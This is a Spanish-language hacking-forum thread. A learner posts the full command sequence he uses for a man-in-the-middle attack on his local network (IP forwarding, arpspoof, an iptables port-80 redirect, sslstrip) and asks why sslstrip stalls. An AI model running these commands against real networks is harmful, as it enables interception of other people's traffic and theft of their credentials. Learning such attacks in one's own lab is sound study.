elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el ttwitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  SSLSTRIP se queda en la fase inicial
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: SSLSTRIP se queda en la fase inicial  (Leído 768 veces)
PapiHaVuelto2.0

Desconectado Desconectado

Mensajes: 2


Ver Perfil
SSLSTRIP se queda en la fase inicial
« en: 22 Diciembre 2015, 02:47 »

Hola a todos.
Este es mi primer post, y es algo que llevo buscando bastante tiempo pero no consigo encontrar la solución.

Estoy tratando de aprender a llevar a cabo un MITM en mi red local (sin ningun fin pernicioso, sólo por el simple hecho de seguir aprendiendo).

Las herramientas que uso son:

S.O: BugTraq2 (también he usado Xubuntu 12.10)
nmap
sslstrip

Empiezo abriendo una terminal y escribo:

- sudo echo "1" > /proc/sys/net/ipv4/ip_forward
- arpspoof -i <interfaz> -t <VictimaIP> <Servidor>

(Aquí, viendo que no conseguía que funcionara SSLSTRIP, y tras leer en varios manuales y forosque había que hacer lo mismo pero a la inversa, también he añadido en algun intento arpspoof -i <interfaz> -t <Servidor> <VictimaIP> )

En otra terminal, escribo lo siguiente:

- sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

(Aquí he probado con distintos puertos, sin obtener nada en ningun momento)

- sslstrip -w cap -l 8080

Y en otra terminal:

- tail -f cap


Tras esto, observo que la terminal en la que ejecuto SSLSTRIP no ha avanzado, sigue en la fase inicial en la que aparece en pantalla: "sslstrip 0.9 by Moxie Marlinspike running..." Y de ahi no se mueve. Añado una foto, para que veáis a qué me refiero.

http://imageshack.com/a/img910/6231/dGE2yv.png

¿Alguien podría decirme el motivo de que sslstrip no corra?

*Nota: Siento haber escrito todos los comandos utilizados ya que todos los conocéis, pero así, si tengo algun error, podéis corregirme.

Gracias de antemano y un saludo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
EJERCICIO INICIAL
Java
java96 2 936 Último mensaje 9 Septiembre 2013, 12:08
por java96
Novato en fase de crecimiento!
Dudas Generales
PinkName 7 2,040 Último mensaje 9 Diciembre 2013, 20:09
por Futhak
Por segunda vez, Alemania queda fuera del Mundial en la primera fase
Foro Libre
El_Andaluz 8 2,132 Último mensaje 2 Julio 2018, 02:08
por El_Andaluz
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines